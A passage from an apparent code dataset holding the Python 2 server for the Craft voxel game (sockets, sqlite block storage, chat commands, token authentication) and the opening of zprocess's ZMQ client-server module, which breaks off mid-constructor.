source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
server.py | # Copyright (C) 2013 Michael Fogleman
# 2020 William Emerison Six
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from math import floor
from world import World
import Queue
import SocketServer
import datetime
import random
import re
import requests
import sqlite3
import sys
import threading
import time
import traceback
# Server defaults.  Any of these names may be overridden by an optional
# config.py (wildcard-imported at the end of this constants section).
DEFAULT_HOST = '0.0.0.0'
DEFAULT_PORT = 4080
# sqlite database and append-only log file paths.
DB_PATH = 'craft.db'
LOG_PATH = 'log.txt'
# World is partitioned into CHUNK_SIZE x CHUNK_SIZE columns (see chunked()).
CHUNK_SIZE = 32
# Socket recv() size in bytes.
BUFFER_SIZE = 4096
# Seconds between sqlite commits.
COMMIT_INTERVAL = 5
AUTH_REQUIRED = True
AUTH_URL = 'https://craft.michaelfogleman.com/api/1/access'
# Length of an in-game day, in real seconds (sent to clients in TIME packets).
DAY_LENGTH = 600
# (x, y, z, rx, ry) assigned to newly connected players.
SPAWN_POINT = (0, 0, 0, 0, 0)
# Rate limiting is checked per packet but disabled unless this is True.
RATE_LIMIT = False
# When True, every block edit is appended to the block_history table.
RECORD_HISTORY = False
# Item ids players may not destroy (16 -- presumably a bedrock-like block;
# TODO confirm against the client's item table).
INDESTRUCTIBLE_ITEMS = set([16])
# Item ids players are allowed to place.
ALLOWED_ITEMS = set([
    0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,
    17, 18, 19, 20, 21, 22, 23,
    32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47,
    48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63])
# Single-letter packet type codes shared with the client.  Note that the
# letter need not match the word (TIME is 'E', YOU is 'U').
AUTHENTICATE = 'A'
BLOCK = 'B'
CHUNK = 'C'
DISCONNECT = 'D'
KEY = 'K'
LIGHT = 'L'
NICK = 'N'
POSITION = 'P'
REDRAW = 'R'
SIGN = 'S'
TALK = 'T'
TIME = 'E'
VERSION = 'V'
YOU = 'U'
try:
    # Optional local overrides for any of the constants above.
    from config import *
except ImportError:
    pass
def log(*args):
    """Print a UTC-timestamped message and append it to LOG_PATH."""
    timestamp = datetime.datetime.utcnow()
    entry = ' '.join(str(part) for part in (timestamp,) + args)
    print(entry)
    with open(LOG_PATH, 'a') as fp:
        fp.write('%s\n' % entry)
def chunked(x):
    """Return the index of the chunk containing world coordinate *x*."""
    nearest = round(x)
    return int(floor(nearest / CHUNK_SIZE))
def packet(*args):
    """Serialize *args* as one comma-separated, newline-terminated line."""
    fields = [str(arg) for arg in args]
    return ','.join(fields) + '\n'
class RateLimiter(object):
    """Token-bucket rate limiter allowing `rate` events per `per` seconds."""
    def __init__(self, rate, per):
        self.rate = float(rate)
        self.per = float(per)
        # Start with a full bucket.
        self.allowance = self.rate
        self.last_check = time.time()
    def tick(self):
        """Record one event; return True when the caller is going too fast.

        Always returns False (allowed) when the module-level RATE_LIMIT
        switch is off.
        """
        if not RATE_LIMIT:
            return False
        now = time.time()
        elapsed = now - self.last_check
        self.last_check = now
        # Refill the bucket in proportion to elapsed time, capped at `rate`.
        self.allowance += elapsed * (self.rate / self.per)
        if self.allowance > self.rate:
            self.allowance = self.rate
        if self.allowance >= 1:
            self.allowance -= 1
            return False  # okay
        return True  # too fast
class Server(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
    # TCP server spawning one Handler thread per connection.
    allow_reuse_address = True
    daemon_threads = True
class Handler(SocketServer.BaseRequestHandler):
    """Per-connection handler.

    The SocketServer request thread (handle) parses newline-delimited
    packets and forwards them to the Model's single worker thread; a
    separate sender thread (run, started from setup) drains self.queue
    back out to the client socket.
    """
    def setup(self):
        # Called by SocketServer before handle(); initializes per-client
        # state and starts the sender thread.
        self.position_limiter = RateLimiter(100, 5)
        self.limiter = RateLimiter(1000, 10)
        self.version = None
        self.client_id = None
        self.user_id = None
        self.nick = None
        self.queue = Queue.Queue()
        self.running = True
        self.start()
    def handle(self):
        """Receive loop: split the stream into lines, rate-limit, and
        enqueue each complete line for the model thread."""
        model = self.server.model
        model.enqueue(model.on_connect, self)
        try:
            # buf holds single characters; extend() splits strings up.
            buf = []
            while True:
                data = self.request.recv(BUFFER_SIZE)
                if not data:
                    break
                buf.extend(data.replace('\r\n', '\n'))
                while '\n' in buf:
                    index = buf.index('\n')
                    line = ''.join(buf[:index])
                    buf = buf[index + 1:]
                    if not line:
                        continue
                    # Position updates get their own (tighter) limiter.
                    if line[0] == POSITION:
                        if self.position_limiter.tick():
                            log('RATE', self.client_id)
                            self.stop()
                            return
                    else:
                        if self.limiter.tick():
                            log('RATE', self.client_id)
                            self.stop()
                            return
                    model.enqueue(model.on_data, self, line)
        finally:
            model.enqueue(model.on_disconnect, self)
    def finish(self):
        # Called by SocketServer after handle(); stops the sender loop.
        self.running = False
    def stop(self):
        # Closing the socket makes recv() in handle() return and unwinds
        # the connection.
        self.request.close()
    def start(self):
        # Launch the sender thread that flushes self.queue to the socket.
        thread = threading.Thread(target=self.run)
        thread.setDaemon(True)
        thread.start()
    def run(self):
        """Sender loop: batch everything currently queued into a single
        sendall() call; times out periodically to re-check self.running."""
        while self.running:
            try:
                buf = []
                try:
                    buf.append(self.queue.get(timeout=5))
                    try:
                        # Drain without blocking to coalesce writes.
                        while True:
                            buf.append(self.queue.get(False))
                    except Queue.Empty:
                        pass
                except Queue.Empty:
                    continue
                data = ''.join(buf)
                self.request.sendall(data)
            except Exception:
                self.request.close()
                raise
    def send_raw(self, data):
        # Queue pre-formatted packet text for the sender thread.
        if data:
            self.queue.put(data)
    def send(self, *args):
        # Format and queue a single packet.
        self.send_raw(packet(*args))
class Model(object):
    """Game-world model and single-threaded command processor.

    All state mutation happens on one worker thread (run), which owns the
    sqlite connection; Handler threads communicate with it only through
    enqueue().  Commands arrive as comma-separated packet lines and are
    dispatched via self.commands; chat slash-commands via self.patterns.
    """
    def __init__(self, seed):
        self.world = World(seed)
        self.clients = []
        self.queue = Queue.Queue()
        # Packet-type letter -> handler method.
        self.commands = {
            AUTHENTICATE: self.on_authenticate,
            CHUNK: self.on_chunk,
            BLOCK: self.on_block,
            LIGHT: self.on_light,
            POSITION: self.on_position,
            TALK: self.on_talk,
            SIGN: self.on_sign,
            VERSION: self.on_version,
        }
        # Chat slash-command regex -> handler method.
        self.patterns = [
            (re.compile(r'^/nick(?:\s+([^,\s]+))?$'), self.on_nick),
            (re.compile(r'^/spawn$'), self.on_spawn),
            (re.compile(r'^/goto(?:\s+(\S+))?$'), self.on_goto),
            (re.compile(r'^/pq\s+(-?[0-9]+)\s*,?\s*(-?[0-9]+)$'), self.on_pq),
            (re.compile(r'^/help(?:\s+(\S+))?$'), self.on_help),
            (re.compile(r'^/list$'), self.on_list),
        ]
    def start(self):
        # Launch the single worker thread.
        thread = threading.Thread(target=self.run)
        thread.setDaemon(True)
        thread.start()
    def run(self):
        """Worker loop: open the database (sqlite connections are bound to
        their creating thread), then process queued work, committing every
        COMMIT_INTERVAL seconds."""
        self.connection = sqlite3.connect(DB_PATH)
        self.create_tables()
        self.commit()
        while True:
            try:
                if time.time() - self.last_commit > COMMIT_INTERVAL:
                    self.commit()
                self.dequeue()
            except Exception:
                # Keep the worker alive on any per-command failure.
                traceback.print_exc()
    def enqueue(self, func, *args, **kwargs):
        # Thread-safe: schedule func(*args, **kwargs) on the worker thread.
        self.queue.put((func, args, kwargs))
    def dequeue(self):
        """Run one queued call; the timeout lets run() reach its periodic
        commit even when the queue is idle."""
        try:
            func, args, kwargs = self.queue.get(timeout=5)
            func(*args, **kwargs)
        except Queue.Empty:
            pass
    def execute(self, *args, **kwargs):
        # Worker-thread-only shortcut for SQL execution.
        return self.connection.execute(*args, **kwargs)
    def commit(self):
        # Also stamps last_commit, which run() checks.
        self.last_commit = time.time()
        self.connection.commit()
    def create_tables(self):
        """Create the block/light/sign/history tables and their indexes
        if they do not already exist."""
        queries = [
            'create table if not exists block ('
            '    p int not null,'
            '    q int not null,'
            '    x int not null,'
            '    y int not null,'
            '    z int not null,'
            '    w int not null'
            ');',
            'create unique index if not exists block_pqxyz_idx on '
            '    block (p, q, x, y, z);',
            'create table if not exists light ('
            '    p int not null,'
            '    q int not null,'
            '    x int not null,'
            '    y int not null,'
            '    z int not null,'
            '    w int not null'
            ');',
            'create unique index if not exists light_pqxyz_idx on '
            '    light (p, q, x, y, z);',
            'create table if not exists sign ('
            '    p int not null,'
            '    q int not null,'
            '    x int not null,'
            '    y int not null,'
            '    z int not null,'
            '    face int not null,'
            '    text text not null'
            ');',
            'create index if not exists sign_pq_idx on sign (p, q);',
            'create unique index if not exists sign_xyzface_idx on '
            '    sign (x, y, z, face);',
            'create table if not exists block_history ('
            '    timestamp real not null,'
            '    user_id int not null,'
            '    x int not null,'
            '    y int not null,'
            '    z int not null,'
            '    w int not null'
            ');',
        ]
        for query in queries:
            self.execute(query)
    def get_default_block(self, x, y, z):
        # Procedurally generated terrain value; 0 means empty.
        p, q = chunked(x), chunked(z)
        chunk = self.world.get_chunk(p, q)
        return chunk.get((x, y, z), 0)
    def get_block(self, x, y, z):
        """Return the stored block type at (x, y, z), falling back to the
        generated terrain when no player edit exists."""
        query = (
            'select w from block where '
            'p = :p and q = :q and x = :x and y = :y and z = :z;'
        )
        p, q = chunked(x), chunked(z)
        rows = list(self.execute(query, dict(p=p, q=q, x=x, y=y, z=z)))
        if rows:
            return rows[0][0]
        return self.get_default_block(x, y, z)
    def next_client_id(self):
        # Smallest positive integer not currently in use.
        result = 1
        client_ids = set(x.client_id for x in self.clients)
        while result in client_ids:
            result += 1
        return result
    def on_connect(self, client):
        """Register a new client: assign id/nick, spawn it, and exchange
        initial state with it and the other players."""
        client.client_id = self.next_client_id()
        client.nick = 'guest%d' % client.client_id
        log('CONN', client.client_id, *client.client_address)
        client.position = SPAWN_POINT
        self.clients.append(client)
        client.send(YOU, client.client_id, *client.position)
        client.send(TIME, time.time(), DAY_LENGTH)
        client.send(TALK, 'Welcome to Craft!')
        client.send(TALK, 'Type "/help" for a list of commands.')
        self.send_position(client)
        self.send_positions(client)
        self.send_nick(client)
        self.send_nicks(client)
    def on_data(self, client, data):
        # Dispatch one packet line to the matching command handler.
        #log('RECV', client.client_id, data)
        args = data.split(',')
        command, args = args[0], args[1:]
        if command in self.commands:
            func = self.commands[command]
            func(client, *args)
    def on_disconnect(self, client):
        # Remove the client and notify everyone else.
        log('DISC', client.client_id, *client.client_address)
        self.clients.remove(client)
        self.send_disconnect(client)
        self.send_talk('%s has disconnected from the server.' % client.nick)
    def on_version(self, client, version):
        """Record the protocol version; only version 1 is accepted and it
        may be set only once."""
        if client.version is not None:
            return
        version = int(version)
        if version != 1:
            client.stop()
            return
        client.version = version
        # TODO: client.start() here
    def on_authenticate(self, client, username, access_token):
        """Verify the access token against AUTH_URL; on success adopt the
        username as the nick, otherwise stay a guest."""
        user_id = None
        if username and access_token:
            payload = {
                'username': username,
                'access_token': access_token,
            }
            response = requests.post(AUTH_URL, data=payload)
            if response.status_code == 200 and response.text.isdigit():
                user_id = int(response.text)
        client.user_id = user_id
        if user_id is None:
            client.nick = 'guest%d' % client.client_id
            client.send(TALK, 'Visit craft.michaelfogleman.com to register!')
        else:
            client.nick = username
        self.send_nick(client)
        # TODO: has left message if was already authenticated
        self.send_talk('%s has joined the game.' % client.nick)
    def on_chunk(self, client, p, q, key=0):
        """Send chunk (p, q) contents: blocks newer than the client's
        cache key, plus all lights and signs, then a KEY/REDRAW/CHUNK
        trailer as appropriate."""
        packets = []
        p, q, key = map(int, (p, q, key))
        query = (
            'select rowid, x, y, z, w from block where '
            'p = :p and q = :q and rowid > :key;'
        )
        rows = self.execute(query, dict(p=p, q=q, key=key))
        max_rowid = 0
        blocks = 0
        for rowid, x, y, z, w in rows:
            blocks += 1
            packets.append(packet(BLOCK, p, q, x, y, z, w))
            max_rowid = max(max_rowid, rowid)
        query = (
            'select x, y, z, w from light where '
            'p = :p and q = :q;'
        )
        rows = self.execute(query, dict(p=p, q=q))
        lights = 0
        for x, y, z, w in rows:
            lights += 1
            packets.append(packet(LIGHT, p, q, x, y, z, w))
        query = (
            'select x, y, z, face, text from sign where '
            'p = :p and q = :q;'
        )
        rows = self.execute(query, dict(p=p, q=q))
        signs = 0
        for x, y, z, face, text in rows:
            signs += 1
            packets.append(packet(SIGN, p, q, x, y, z, face, text))
        if blocks:
            # New cache key for the client's next CHUNK request.
            packets.append(packet(KEY, p, q, max_rowid))
        if blocks or lights or signs:
            packets.append(packet(REDRAW, p, q))
        packets.append(packet(CHUNK, p, q))
        client.send_raw(''.join(packets))
    def on_block(self, client, x, y, z, w):
        """Validate and apply a block edit (w == 0 destroys); on rejection
        the authoritative previous value is re-sent to the client."""
        x, y, z, w = map(int, (x, y, z, w))
        p, q = chunked(x), chunked(z)
        previous = self.get_block(x, y, z)
        message = None
        if AUTH_REQUIRED and client.user_id is None:
            message = 'Only logged in users are allowed to build.'
        elif y <= 0 or y > 255:
            message = 'Invalid block coordinates.'
        elif w not in ALLOWED_ITEMS:
            message = 'That item is not allowed.'
        elif w and previous:
            message = 'Cannot create blocks in a non-empty space.'
        elif not w and not previous:
            message = 'That space is already empty.'
        elif previous in INDESTRUCTIBLE_ITEMS:
            message = 'Cannot destroy that type of block.'
        if message is not None:
            client.send(BLOCK, p, q, x, y, z, previous)
            client.send(REDRAW, p, q)
            client.send(TALK, message)
            return
        query = (
            'insert into block_history (timestamp, user_id, x, y, z, w) '
            'values (:timestamp, :user_id, :x, :y, :z, :w);'
        )
        if RECORD_HISTORY:
            self.execute(query, dict(timestamp=time.time(),
                user_id=client.user_id, x=x, y=y, z=z, w=w))
        query = (
            'insert or replace into block (p, q, x, y, z, w) '
            'values (:p, :q, :x, :y, :z, :w);'
        )
        self.execute(query, dict(p=p, q=q, x=x, y=y, z=z, w=w))
        self.send_block(client, p, q, x, y, z, w)
        # Blocks on a chunk border are also recorded in the adjacent
        # chunk(s) with a negated w -- apparently a marker so neighboring
        # chunks render the shared face; TODO confirm client semantics.
        for dx in range(-1, 2):
            for dz in range(-1, 2):
                if dx == 0 and dz == 0:
                    continue
                # Skip neighbors that are still the same chunk.
                if dx and chunked(x + dx) == p:
                    continue
                if dz and chunked(z + dz) == q:
                    continue
                np, nq = p + dx, q + dz
                self.execute(query, dict(p=np, q=nq, x=x, y=y, z=z, w=-w))
                self.send_block(client, np, nq, x, y, z, -w)
        if w == 0:
            # Destroying a block removes any sign/light attached to it.
            query = (
                'delete from sign where '
                'x = :x and y = :y and z = :z;'
            )
            self.execute(query, dict(x=x, y=y, z=z))
            query = (
                'update light set w = 0 where '
                'x = :x and y = :y and z = :z;'
            )
            self.execute(query, dict(x=x, y=y, z=z))
    def on_light(self, client, x, y, z, w):
        """Validate and store a light value (0-15) on an existing block."""
        x, y, z, w = map(int, (x, y, z, w))
        p, q = chunked(x), chunked(z)
        block = self.get_block(x, y, z)
        message = None
        if AUTH_REQUIRED and client.user_id is None:
            message = 'Only logged in users are allowed to build.'
        elif block == 0:
            message = 'Lights must be placed on a block.'
        elif w < 0 or w > 15:
            message = 'Invalid light value.'
        if message is not None:
            # TODO: client.send(LIGHT, p, q, x, y, z, previous)
            client.send(REDRAW, p, q)
            client.send(TALK, message)
            return
        query = (
            'insert or replace into light (p, q, x, y, z, w) '
            'values (:p, :q, :x, :y, :z, :w);'
        )
        self.execute(query, dict(p=p, q=q, x=x, y=y, z=z, w=w))
        self.send_light(client, p, q, x, y, z, w)
    def on_sign(self, client, x, y, z, face, *args):
        """Store (or, with empty text, delete) a sign on a block face.
        The text may contain commas, so it arrives as *args."""
        if AUTH_REQUIRED and client.user_id is None:
            client.send(TALK, 'Only logged in users are allowed to build.')
            return
        text = ','.join(args)
        x, y, z, face = map(int, (x, y, z, face))
        if y <= 0 or y > 255:
            return
        if face < 0 or face > 7:
            return
        if len(text) > 48:
            return
        p, q = chunked(x), chunked(z)
        if text:
            query = (
                'insert or replace into sign (p, q, x, y, z, face, text) '
                'values (:p, :q, :x, :y, :z, :face, :text);'
            )
            self.execute(query,
                dict(p=p, q=q, x=x, y=y, z=z, face=face, text=text))
        else:
            query = (
                'delete from sign where '
                'x = :x and y = :y and z = :z and face = :face;'
            )
            self.execute(query, dict(x=x, y=y, z=z, face=face))
        self.send_sign(client, p, q, x, y, z, face, text)
    def on_position(self, client, x, y, z, rx, ry):
        # Record the client's position/rotation and broadcast it.
        x, y, z, rx, ry = map(float, (x, y, z, rx, ry))
        client.position = (x, y, z, rx, ry)
        self.send_position(client)
    def on_talk(self, client, *args):
        """Chat dispatcher: '/...' runs a slash command, '@nick ...' sends
        a private message, anything else is broadcast."""
        text = ','.join(args)
        if text.startswith('/'):
            for pattern, func in self.patterns:
                match = pattern.match(text)
                if match:
                    func(client, *match.groups())
                    break
            else:
                # for/else: no pattern matched.
                client.send(TALK, 'Unrecognized command: "%s"' % text)
        elif text.startswith('@'):
            nick = text[1:].split(' ', 1)[0]
            for other in self.clients:
                if other.nick == nick:
                    client.send(TALK, '%s> %s' % (client.nick, text))
                    other.send(TALK, '%s> %s' % (client.nick, text))
                    break
            else:
                client.send(TALK, 'Unrecognized nick: "%s"' % nick)
        else:
            self.send_talk('%s> %s' % (client.nick, text))
    def on_nick(self, client, nick=None):
        """/nick [NAME]: show or change the nickname (disabled when the
        server requires authentication)."""
        if AUTH_REQUIRED:
            client.send(TALK, 'You cannot change your nick on this server.')
            return
        if nick is None:
            client.send(TALK, 'Your nickname is %s' % client.nick)
        else:
            self.send_talk('%s is now known as %s' % (client.nick, nick))
            client.nick = nick
            self.send_nick(client)
    def on_spawn(self, client):
        # /spawn: teleport back to the spawn point.
        client.position = SPAWN_POINT
        client.send(YOU, client.client_id, *client.position)
        self.send_position(client)
    def on_goto(self, client, nick=None):
        """/goto [NAME]: teleport to the named player, or to a random
        other player when no name is given."""
        if nick is None:
            clients = [x for x in self.clients if x != client]
            other = random.choice(clients) if clients else None
        else:
            nicks = dict((client.nick, client) for client in self.clients)
            other = nicks.get(nick)
        if other:
            client.position = other.position
            client.send(YOU, client.client_id, *client.position)
            self.send_position(client)
    def on_pq(self, client, p, q):
        # /pq P Q: teleport to the given chunk (bounded to +/-1000).
        p, q = map(int, (p, q))
        if abs(p) > 1000 or abs(q) > 1000:
            return
        client.position = (p * CHUNK_SIZE, 0, q * CHUNK_SIZE, 0, 0)
        client.send(YOU, client.client_id, *client.position)
        self.send_position(client)
    def on_help(self, client, topic=None):
        """/help [TOPIC]: show the command summary or per-command help.
        Some listed commands (/login, /offline, /view...) are handled
        client-side, not by this server."""
        if topic is None:
            client.send(TALK, 'Type "t" to chat. Type "/" to type commands:')
            client.send(TALK, '/goto [NAME], /help [TOPIC], /list, /login NAME, /logout, /nick')
            client.send(TALK, '/offline [FILE], /online HOST [PORT], /pq P Q, /spawn, /view N')
            return
        topic = topic.lower().strip()
        if topic == 'goto':
            client.send(TALK, 'Help: /goto [NAME]')
            client.send(TALK, 'Teleport to another user.')
            client.send(TALK, 'If NAME is unspecified, a random user is chosen.')
        elif topic == 'list':
            client.send(TALK, 'Help: /list')
            client.send(TALK, 'Display a list of connected users.')
        elif topic == 'login':
            client.send(TALK, 'Help: /login NAME')
            client.send(TALK, 'Switch to another registered username.')
            client.send(TALK, 'The login server will be re-contacted. The username is case-sensitive.')
        elif topic == 'logout':
            client.send(TALK, 'Help: /logout')
            client.send(TALK, 'Unauthenticate and become a guest user.')
            client.send(TALK, 'Automatic logins will not occur again until the /login command is re-issued.')
        elif topic == 'offline':
            client.send(TALK, 'Help: /offline [FILE]')
            client.send(TALK, 'Switch to offline mode.')
            client.send(TALK, 'FILE specifies the save file to use and defaults to "craft".')
        elif topic == 'online':
            client.send(TALK, 'Help: /online HOST [PORT]')
            client.send(TALK, 'Connect to the specified server.')
        elif topic == 'nick':
            client.send(TALK, 'Help: /nick [NICK]')
            client.send(TALK, 'Get or set your nickname.')
        elif topic == 'pq':
            client.send(TALK, 'Help: /pq P Q')
            client.send(TALK, 'Teleport to the specified chunk.')
        elif topic == 'spawn':
            client.send(TALK, 'Help: /spawn')
            client.send(TALK, 'Teleport back to the spawn point.')
        elif topic == 'view':
            client.send(TALK, 'Help: /view N')
            client.send(TALK, 'Set viewing distance, 1 - 24.')
    def on_list(self, client):
        # /list: names of all connected players.
        client.send(TALK,
            'Players: %s' % ', '.join(x.nick for x in self.clients))
    def send_positions(self, client):
        # Tell `client` where everyone else is.
        for other in self.clients:
            if other == client:
                continue
            client.send(POSITION, other.client_id, *other.position)
    def send_position(self, client):
        # Tell everyone else where `client` is.
        for other in self.clients:
            if other == client:
                continue
            other.send(POSITION, client.client_id, *client.position)
    def send_nicks(self, client):
        # Tell `client` everyone else's nick.
        for other in self.clients:
            if other == client:
                continue
            client.send(NICK, other.client_id, other.nick)
    def send_nick(self, client):
        # Broadcast `client`'s nick (including to itself).
        for other in self.clients:
            other.send(NICK, client.client_id, client.nick)
    def send_disconnect(self, client):
        # Tell everyone else that `client` left.
        for other in self.clients:
            if other == client:
                continue
            other.send(DISCONNECT, client.client_id)
    def send_block(self, client, p, q, x, y, z, w):
        # Broadcast a block change (the originating client already knows).
        for other in self.clients:
            if other == client:
                continue
            other.send(BLOCK, p, q, x, y, z, w)
            other.send(REDRAW, p, q)
    def send_light(self, client, p, q, x, y, z, w):
        # Broadcast a light change.
        for other in self.clients:
            if other == client:
                continue
            other.send(LIGHT, p, q, x, y, z, w)
            other.send(REDRAW, p, q)
    def send_sign(self, client, p, q, x, y, z, face, text):
        # Broadcast a sign change.
        for other in self.clients:
            if other == client:
                continue
            other.send(SIGN, p, q, x, y, z, face, text)
    def send_talk(self, text):
        # Broadcast a chat line to all clients (and the server log).
        log(text)
        for client in self.clients:
            client.send(TALK, text)
def cleanup():
    """Offline maintenance: emit (on stdout) a SQL transaction deleting
    stored blocks that merely duplicate the generated terrain, so the
    database can be shrunk.  Run as `python server.py cleanup` and pipe
    the output into sqlite3.  (Python 2 print statements throughout.)"""
    world = World(None)
    conn = sqlite3.connect(DB_PATH)
    # Most recently placed block is always kept.  NOTE(review): raises
    # IndexError on an empty block table -- presumably acceptable for a
    # maintenance script; confirm.
    query = 'select x, y, z from block order by rowid desc limit 1;'
    last = list(conn.execute(query))[0]
    query = 'select distinct p, q from block;'
    chunks = list(conn.execute(query))
    count = 0
    total = 0
    delete_query = 'delete from block where x = %d and y = %d and z = %d;'
    print 'begin;'
    for p, q in chunks:
        chunk = world.create_chunk(p, q)
        query = 'select x, y, z, w from block where p = :p and q = :q;'
        rows = conn.execute(query, {'p': p, 'q': q})
        for x, y, z, w in rows:
            # Skip border copies stored under a neighboring chunk
            # (see Model.on_block).
            if chunked(x) != p or chunked(z) != q:
                continue
            total += 1
            if (x, y, z) == last:
                continue
            original = chunk.get((x, y, z), 0)
            # Redundant if it matches terrain, or if the terrain block is
            # indestructible anyway.
            if w == original or original in INDESTRUCTIBLE_ITEMS:
                count += 1
                print delete_query % (x, y, z)
    conn.close()
    print 'commit;'
    # Summary goes to stderr so stdout stays pipeable SQL.
    print >> sys.stderr, '%d of %d blocks will be cleaned up' % (count, total)
def main():
    """Entry point.

    Usage: server.py [HOST [PORT]]   -- run the game server
           server.py cleanup         -- print database-cleanup SQL
    """
    if len(sys.argv) == 2 and sys.argv[1] == 'cleanup':
        cleanup()
        return
    host, port = DEFAULT_HOST, DEFAULT_PORT
    if len(sys.argv) > 1:
        host = sys.argv[1]
    if len(sys.argv) > 2:
        port = int(sys.argv[2])
    log('SERV', host, port)
    model = Model(None)
    model.start()
    server = Server((host, port), Handler)
    # Handlers reach the model through their server reference.
    server.model = model
    server.serve_forever()
if __name__ == '__main__':
    main()
|
clientserver.py | #####################################################################
# #
# clientserver.py #
# #
# Copyright 2013 - 2018, Chris Billington #
# #
# This file is part of the zprocess project (see #
# https://bitbucket.org/cbillington/zprocess) and is licensed under #
# the Simplified BSD License. See the license.txt file in the root #
# of the project for the full license. #
# #
#####################################################################
from __future__ import division, unicode_literals, print_function, absolute_import
import sys
import os
import threading
import time
import traceback
from functools import partial
from socket import gethostbyname
from binascii import hexlify
import zmq
_path, _cwd = os.path.split(os.getcwd())
if _cwd == 'zprocess' and _path not in sys.path:
# Running from within zprocess dir? Add to sys.path for testing during
# development:
sys.path.insert(0, _path)
import zprocess
from zprocess.security import SecureContext
from zprocess.utils import (
raise_exception_in_thread,
Interruptor,
Interrupted,
TimeoutError,
)
# Python 2/3 compatibility shims.
PY2 = sys.version_info[0] == 2
if PY2:
    # Python 2 has no time.monotonic; time.time stands in (NOTE(review):
    # not actually monotonic -- wall-clock adjustments can affect timeouts).
    from time import time as monotonic
    # In this module, `str` always means text (unicode).
    str = unicode
else:
    from time import monotonic
def _typecheck_or_convert_data(data, dtype):
"""Utility function to check that messages are the valid type to be sent, for
the dtype (one of 'pyobj', 'multipart', 'string', or 'raw'). Returns converted
data or raises TypeError. Only conversion done is to wrap single bytes objects
into a single-element list for multipart messages. We *do not* do auto encoding
of strings here. Strings can't be sent by raw and multipart sends, so yes, they
need to be encoded, but we can't to auto *decoding* on the other end, because
the data may not represent text - it might just be bytes. So we prefer symmetry
and so don't encode here."""
# when not using python objects, a null message should be an empty string:
if data is None and dtype in ['raw', 'multipart']:
data = b''
elif data is None and dtype == 'string':
data = ''
if dtype == 'multipart' and isinstance(data, bytes):
# Wrap up a single string into a list so it doesn't get sent
# as one character per message!
data = [data]
# Type error checking:
if dtype == 'raw':
if not isinstance(data, bytes):
msg = 'raw sockets can only send bytes, not {}.'.format(type(data))
raise TypeError(msg)
elif dtype == 'string':
if PY2 and isinstance(data, bytes):
# Auto convert assuming UTF8:
data = data.decode('utf8')
if not isinstance(data, str):
msg = ('string sockets can only send strings, ' +
'not {}.'.format(type(data)))
raise TypeError(msg)
elif dtype == 'multipart':
if not all(isinstance(part, bytes) for part in data):
msg = ('multipart sockets can only send an iterable of '
'bytes objects, not {}.'.format(type(data)))
raise TypeError(msg)
elif dtype != 'pyobj':
msg = ("invalid dtype %s, " % str(dtype) +
"must be 'raw', 'string', 'multipart' or 'pyobj'")
raise ValueError(msg)
return data
class _NO_RESPONSE(object):
"""Sentinel for use as a return value from ZMQServer.handler to indicate that a
response has already been sent to the client manually via ZMQServer.send(), and that
the server mainloop should not send a response"""
pass
class ZMQServer(object):
    """Wrapper around a zmq.REP or zmq.PULL socket.

    Runs a mainloop in a daemon thread that receives each request, passes
    it to self.handler(), and (unless pull_only) sends the return value
    back to the client.  Subclasses override handler(), and optionally
    timeout() for periodic housekeeping every timeout_interval seconds.

    Fixes relative to the previous revision: the class docstring was
    placed after the NO_RESPONSE assignment (so it was a discarded bare
    string, not __doc__), and the invalid-dtype error message applied %
    to a format-less string, raising TypeError instead of the intended
    ValueError.
    """
    # Sentinel handler() may return to indicate it already replied via
    # self.send() and the mainloop should not send anything.
    NO_RESPONSE = _NO_RESPONSE

    def __init__(self, port=None, dtype='pyobj', pull_only=False,
                 bind_address='tcp://*', shared_secret=None,
                 allow_insecure=False, timeout_interval=None):
        self.port = port
        self.dtype = dtype
        self.pull_only = pull_only
        self.bind_address = bind_address
        self.shared_secret = shared_secret
        self.allow_insecure = allow_insecure
        self.timeout_interval = timeout_interval
        self._crashed = threading.Event()
        self.stopping = False
        if 'setup_auth' in self.__class__.__dict__:
            # Backward compatibility for subclasses implementing their own
            # authentication:
            self.context = zmq.Context()
            self.auth = self.setup_auth(self.context)
            if self.pull_only:
                self.sock = self.context.socket(zmq.PULL)
            else:
                self.sock = self.context.socket(zmq.REP)
        else:
            # Our shared secret authentication:
            self.context = SecureContext.instance(shared_secret=shared_secret)
            if self.pull_only:
                self.sock = self.context.socket(zmq.PULL,
                                                allow_insecure=allow_insecure)
            else:
                self.sock = self.context.socket(zmq.REP,
                                                allow_insecure=allow_insecure)
        self.poller = zmq.Poller()
        # Don't block on unsent messages when the socket closes:
        self.sock.setsockopt(zmq.LINGER, 0)
        if self.port is not None:
            self.sock.bind('%s:%d' % (self.bind_address, self.port))
        else:
            self.port = self.sock.bind_to_random_port(self.bind_address)
        self.poller.register(self.sock, zmq.POLLIN)
        # An inproc socket pair lets shutdown() wake the mainloop:
        self._shutdown_sock = self.context.socket(zmq.PULL)
        self._shutdown_endpoint = 'inproc://zpself' + hexlify(os.urandom(8)).decode()
        self._shutdown_sock.bind(self._shutdown_endpoint)
        self.poller.register(self._shutdown_sock, zmq.POLLIN)
        # Bind send/recv to the methods appropriate for the wire format:
        if self.dtype == 'raw':
            self.send = self.sock.send
            self.recv = self.sock.recv
        elif self.dtype == 'string':
            self.send = self.sock.send_string
            self.recv = self.sock.recv_string
        elif self.dtype == 'multipart':
